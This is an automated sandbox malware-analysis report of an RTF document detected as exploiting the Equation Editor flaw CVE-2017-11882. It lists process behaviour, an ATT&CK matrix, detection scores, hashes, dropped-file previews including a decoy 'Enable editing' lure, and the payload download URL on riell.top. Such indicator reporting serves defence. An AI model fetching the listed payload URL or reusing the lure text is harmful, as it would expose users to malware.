      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1452Thread sleep time: -240000s >= -30000sJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3272Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts33
      Exploitation for Client Execution
      1
      DLL Side-Loading
      1
      Process Injection
      1
      Masquerading
      OS Credential Dumping1
      Virtualization/Sandbox Evasion
      Remote Services1
      Archive Collected Data
      11
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading
      1
      Modify Registry
      LSASS Memory1
      Remote System Discovery
      Remote Desktop ProtocolData from Removable Media2
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      Virtualization/Sandbox Evasion
      Security Account Manager1
      File and Directory Discovery
      SMB/Windows Admin SharesData from Network Shared Drive2
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Process Injection
      NTDS3
      System Information Discovery
      Distributed Component Object ModelInput Capture13
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information
      LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Install Root Certificate
      Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading
      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      xJvN1QBl91.rtf49%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
      xJvN1QBl91.rtf48%VirustotalBrowse
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      riell.top13%VirustotalBrowse
      SourceDetectionScannerLabelLink
      http://crl.entrust.net/server1.crl00%URL Reputationsafe
      http://ocsp.entrust.net030%URL Reputationsafe
      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
      http://ocsp.entrust.net0D0%URL Reputationsafe
      https://secure.comodo.com/CPS00%URL Reputationsafe
      http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
      https://www.cloudflare.com/learning/access-management/phishing-attack/0%Avira URL Cloudsafe
      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%Avira URL Cloudsafe
      https://riell.top/white.scrj0%Avira URL Cloudsafe
      http://crl.use0%Avira URL Cloudsafe
      https://riell.top/white.scrjjC:0%Avira URL Cloudsafe
      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%Avira URL Cloudsafe
      https://riell.top/white.scr100%Avira URL Cloudmalware
      https://riell.top/:0%Avira URL Cloudsafe
      https://riell.top/a0%Avira URL Cloudsafe
      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%VirustotalBrowse
      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%VirustotalBrowse
      https://www.cloudflare.com/5xx-error-landing0%Avira URL Cloudsafe
      https://www.cloudflare.com/learning/access-management/phishing-attack/0%VirustotalBrowse
      https://riell.top/white.scr7%VirustotalBrowse
      https://www.cloudflare.com/5xx-error-landing0%VirustotalBrowse
      NameIPActiveMaliciousAntivirus DetectionReputation
      riell.top
      188.114.96.3
      truetrueunknown
      NameMaliciousAntivirus DetectionReputation
      https://riell.top/white.scrtrue
      • 7%, Virustotal, Browse
      • Avira URL Cloud: malware
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://www.cloudflare.com/learning/access-management/phishing-attack/EQNEDT32.EXE, 00000002.00000002.346288953.0000000000920000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.346288953.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, white[1].htm.2.dr, white72911.scr.2.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0EQNEDT32.EXE, 00000002.00000002.346288953.0000000000920000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.346288953.0000000000961000.00000004.00000020.00020000.00000000.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      http://crl.entrust.net/server1.crl0EQNEDT32.EXE, 00000002.00000002.346288953.0000000000920000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.346288953.0000000000961000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://riell.top/white.scrjEQNEDT32.EXE, 00000002.00000002.346288953.00000000008DF000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      unknown
      https://riell.top/white.scrjjC:EQNEDT32.EXE, 00000002.00000002.346288953.00000000008DF000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      unknown
      http://ocsp.entrust.net03EQNEDT32.EXE, 00000002.00000002.346288953.0000000000920000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.346288953.0000000000961000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://crl.useEQNEDT32.EXE, 00000002.00000002.346288953.0000000000961000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0EQNEDT32.EXE, 00000002.00000002.346288953.0000000000920000.00000004.00000020.00020000.00000000.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      http://www.diginotar.nl/cps/pkioverheid0EQNEDT32.EXE, 00000002.00000002.346288953.0000000000920000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.346288953.0000000000961000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://riell.top/:EQNEDT32.EXE, 00000002.00000002.346288953.0000000000920000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      unknown
      http://ocsp.entrust.net0DEQNEDT32.EXE, 00000002.00000002.346288953.0000000000961000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://secure.comodo.com/CPS0EQNEDT32.EXE, 00000002.00000002.346288953.0000000000920000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.346288953.0000000000961000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://crl.entrust.net/2048ca.crl0EQNEDT32.EXE, 00000002.00000002.346288953.0000000000961000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://riell.top/aEQNEDT32.EXE, 00000002.00000002.346288953.0000000000920000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      unknown
      https://www.cloudflare.com/5xx-error-landingEQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.346288953.0000000000920000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.346288953.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, white[1].htm.2.dr, white72911.scr.2.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      188.114.96.3
      riell.topEuropean Union
      13335CLOUDFLARENETUStrue
      Joe Sandbox version:40.0.0 Tourmaline
      Analysis ID:1467965
      Start date and time:2024-07-05 07:21:41 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 4m 12s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:9
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:xJvN1QBl91.rtf
      renamed because original name is a hash value
      Original Sample Name:de3ba4db4f0cf4d3b92ad9429de7545e.rtf
      Detection:MAL
      Classification:mal100.phis.expl.winRTF@4/11@1/1
      EGA Information:Failed
      HCA Information:Failed
      Cookbook Comments:
      • Found application associated with file extension: .rtf
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Active ActiveX Object
      • Scroll down
      • Close Viewer
      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, svchost.exe
      • Execution Graph export aborted for target EQNEDT32.EXE, PID 1272 because there are no executed function
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • Report size getting too big, too many NtSetInformationFile calls found.
      TimeTypeDescription
      01:22:27API Interceptor279x Sleep call for process: EQNEDT32.EXE modified
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      188.114.96.3http://www.telegramkv.com/Get hashmaliciousUnknownBrowse
      • www.telegramkv.com/
      Scan405.exeGet hashmaliciousFormBookBrowse
      • www.jjjw.xyz/ypml/
      AuT5pFGTFw.exeGet hashmaliciousFormBookBrowse
      • www.coinwab.com/efdt/
      http://business.ifbsmetaiidentiityconfirms.com/meta-community-standard100068928266341/Get hashmaliciousHTMLPhisherBrowse
      • business.ifbsmetaiidentiityconfirms.com/favicon.ico
      BL Draft.exeGet hashmaliciousFormBookBrowse
      • www.ediancai.cn/x7r2/
      QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
      • filetransfer.io/data-package/btd2ptah/download
      Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeGet hashmaliciousFormBookBrowse
      • www.ad14.fun/oc7s/
      spec 4008670601 AZTEK Order.exeGet hashmaliciousFormBookBrowse
      • www.ad14.fun/oc7s/
      9098393827383039.exeGet hashmaliciousFormBookBrowse
      • www.coinwab.com/kqqj/
      SOA 020724.exeGet hashmaliciousFormBookBrowse
      • www.ad14.fun/az6h/?Vn=Ydx4qJJ0n&3jJlx=2tWzkzncG4ra8DBegJJBToW7oB13AdJXZ1KkbDLW+Ah9MGsNEQDOdLre6u2t4zOJ63yLnsPJ97sPnqMxsSzbOxuABFq0Im2Ecm9EQ8GOdhogxDCvRrrALITlDFg7ZHNgcXHQPxMcHnGf
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      riell.topOVER DUE INVOICE PAYMENT.docxGet hashmaliciousSnake KeyloggerBrowse
      • 188.114.96.3
      OVER DUE INVOICE PAYMENT.docx.docGet hashmaliciousSnake KeyloggerBrowse
      • 188.114.97.3
      swift_copy.docx.docGet hashmaliciousUnknownBrowse
      • 188.114.96.3
      swift_copy.docx.docGet hashmaliciousUnknownBrowse
      • 188.114.97.3
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      CLOUDFLARENETUSSwift tract-20240506_120.xlsGet hashmaliciousRemcosBrowse
      • 172.67.148.197
      IMG 003.exeGet hashmaliciousAgentTeslaBrowse
      • 172.67.74.152
      msupdate.exeGet hashmaliciousUnknownBrowse
      • 104.26.13.205
      msupdate.exeGet hashmaliciousUnknownBrowse
      • 172.67.74.152
      pirates.batGet hashmaliciousKematian StealerBrowse
      • 104.16.124.96
      pirates.batGet hashmaliciousKematian StealerBrowse
      • 104.16.123.96
      c2e57fb2b8206bd9b5d05d8a9b0d2e78082dd303ee6364b288d568fcd48900f7_dump.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
      • 104.26.12.205
      6xmBUtHylU.exeGet hashmaliciousLummaCBrowse
      • 188.114.96.3
      XX(1).exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
      • 172.67.74.152
      OVER DUE INVOICE PAYMENT.docxGet hashmaliciousSnake KeyloggerBrowse
      • 188.114.96.3
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      7dcce5b76c8b17472d024758970a406bSwift tract-20240506_120.xlsGet hashmaliciousRemcosBrowse
      • 188.114.96.3
      OVER DUE INVOICE PAYMENT.docxGet hashmaliciousSnake KeyloggerBrowse
      • 188.114.96.3
      OVER DUE INVOICE PAYMENT.docx.docGet hashmaliciousSnake KeyloggerBrowse
      • 188.114.96.3
      swift_copy.docx.docGet hashmaliciousUnknownBrowse
      • 188.114.96.3
      Payment receipt_1.docx.docGet hashmaliciousLokibotBrowse
      • 188.114.96.3
      Payment_Advice.xlsGet hashmaliciousUnknownBrowse
      • 188.114.96.3
      SecuriteInfo.com.Exploit.CVE-2018-0798.4.30916.4690.rtfGet hashmaliciousUnknownBrowse
      • 188.114.96.3
      statement .xlsGet hashmaliciousUnknownBrowse
      • 188.114.96.3
      INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousUnknownBrowse
      • 188.114.96.3
      Bank Slip 2.docGet hashmaliciousSnake KeyloggerBrowse
      • 188.114.96.3
      No context
      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      File Type:HTML document, ASCII text, with very long lines (394)
      Category:dropped
      Size (bytes):4403
      Entropy (8bit):5.082514093739441
      Encrypted:false
      SSDEEP:96:1j9jwIjYjUDK/D5DMF+BOisR+A2ZLimurR49PaQxJbGD:1j9jhjYjIK/Vo+tsR6ZOmurO9ieJGD
      MD5:7210BEAC6B5B7EE7B5D1852C7526B88D
      SHA1:B4A03626A96996998425F7EF1BDA42A2590D7CB9
      SHA-256:5D2536B30D14B47F95683ADC66FEC65837B753294D7ADC167B79792CC752A3F9
      SHA-512:45FE3F840EB42DA4CB13CE28BDD16C782E13974276BBD7106A70D6CD6DBB69EE7336F48E009487078B5721FFEBFBE678A9AD925734F6B3E3D35FA0CB7776201C
      Malicious:true
      Yara Hits:
      • Rule: JoeSecurity_BlockedWebSite, Description: Yara detected BlockedWebSite, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\white[1].htm, Author: Joe Security
      Reputation:low
      Preview:<!DOCTYPE html>. [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->. [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->. [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->.<head>.<title>Suspected phishing site | Cloudflare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]-->.<style>body{margin:0;padding:0}</style>... [if gte IE 10]> >.<script>. if (!navigator.cookieEnabled) {. window.addEventListener('DOMContentLoaded
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):16384
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3::
      MD5:CE338FE6899778AACFC28414F2D9498B
      SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
      SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
      SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
      Malicious:false
      Reputation:high, very likely benign file
      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):1536
      Entropy (8bit):1.3552060938024997
      Encrypted:false
      SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlb4:IiiiiiiiiifdLloZQc8++lsJe1Mz7/n
      MD5:AB74510833B755946AC8FBC9ABE226CD
      SHA1:F6C7F252D4A8A5DF62A2CE343DA7FC1ABA3CE0CE
      SHA-256:A8799F967B48C21FB9D3CDCE7DEEE0C5A3CCAB08EFAC1B47B7B4599848BAB87D
      SHA-512:5DA87C48E4E32E875F0273E0184EC2636094E175061DC554AC961FE1671FC1F2425B7B47CE9DDB91FB0C19D2EA971B3B38CFECC3A1D73227BA216C22BED06694
      Malicious:false
      Reputation:low
      Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):184320
      Entropy (8bit):3.5134252297323174
      Encrypted:false
      SSDEEP:3072:1yemryemryemryemryemryemryemryemryemryem4Mowdo:1yemryemryemryemryemryemryemryeL
      MD5:393B3C896BD8D234B0DFA48E54488E50
      SHA1:838FBD4E3760D018C3BF425928AF911C71A83BDB
      SHA-256:A802A82CDE4E2B435171B3134A4A141C67C52FC12189DE12EC9EE1CDF6EB7ABE
      SHA-512:EBBF9AEA337EC4D49A3E99D3D5DFFFFBFA05216E17ABACFC86A2F1D7991F4A827C1C9D5714150DCBA823A411680BE270DB17D869742BE05BC25248E08207139C
      Malicious:false
      Reputation:low
      Preview:1.1.1.8.4.1.6.3.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):1024
      Entropy (8bit):0.05390218305374581
      Encrypted:false
      SSDEEP:3:ol3lYdn:4Wn
      MD5:5D4D94EE7E06BBB0AF9584119797B23A
      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
      Malicious:false
      Reputation:high, very likely benign file
      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:Generic INItialization configuration [folders]
      Category:dropped
      Size (bytes):55
      Entropy (8bit):4.603998122576232
      Encrypted:false
      SSDEEP:3:HWlLFSm4VtLFSv:H22c
      MD5:80318833F0C8583F5F69A71127C876CD
      SHA1:A52FB037BFC822712582FB05D0D0606FCDC73A41
      SHA-256:023396818CBDCFE348B2854C6747679E27325F8F14C9C2D8F47A03CA2259ADBD
      SHA-512:968D9D340C0347D5B527950F32EF4E6AE4C14A90E9154DF90C70918568D86CAE7EE1053BA6949BB0E5C51B52E1457D384F8A4148C0E067EFCC8839B198966488
      Malicious:false
      Reputation:low
      Preview:[misc]..xJvN1QBl91.LNK=0..[folders]..xJvN1QBl91.LNK=0..
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:06 2023, mtime=Fri Aug 11 15:42:06 2023, atime=Fri Jul 5 04:22:25 2024, length=313441, window=hide
      Category:dropped
      Size (bytes):1014
      Entropy (8bit):4.543328374001571
      Encrypted:false
      SSDEEP:12:8H0lcFgXg/XAlCPCHaXGBJB/BGFX+W8u2uoNv0ZSicvbF4D0ZSDtZ3YilMMEpxRN:8UlY/XT27bk5I6e2hDv3qm1k7N
      MD5:9EF1DA84EDB810E85142833686CC5F1F
      SHA1:2643036D56066EEB2C9D621476D3B238F46FF9BB
      SHA-256:C063DCE5E2277CC46174B8099286DDC2399BE2C222073CF55825AC85DA619D69
      SHA-512:3699A5C129B69AC58F3C9E968FE123A90B618F8F5A8E4F47301435F8FBA3695E552CEF84038B89D0CD21E5A64DC90CDC92F84A76085DBFC38A36D7E5FF03D6C6
      Malicious:false
      Reputation:low
      Preview:L..................F.... ....o.r....o.r...,.]R....a............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X.*..user.8......QK.X.X.**...&=....U...............A.l.b.u.s.....z.1......WE...Desktop.d......QK.X.WE.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2.a....X.* .XJVN1Q~1.RTF..J.......WD..WD.*.........................x.J.v.N.1.Q.B.l.9.1...r.t.f.......x...............-...8...[............?J......C:\Users\..#...................\\980108\Users.user\Desktop\xJvN1QBl91.rtf.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.x.J.v.N.1.Q.B.l.9.1...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......980108..........D_....3N...W...9.W.e8...8.....[D_....3N...W...9.W.e8
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):162
      Entropy (8bit):2.4797606462020307
      Encrypted:false
      SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
      MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
      SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
      SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
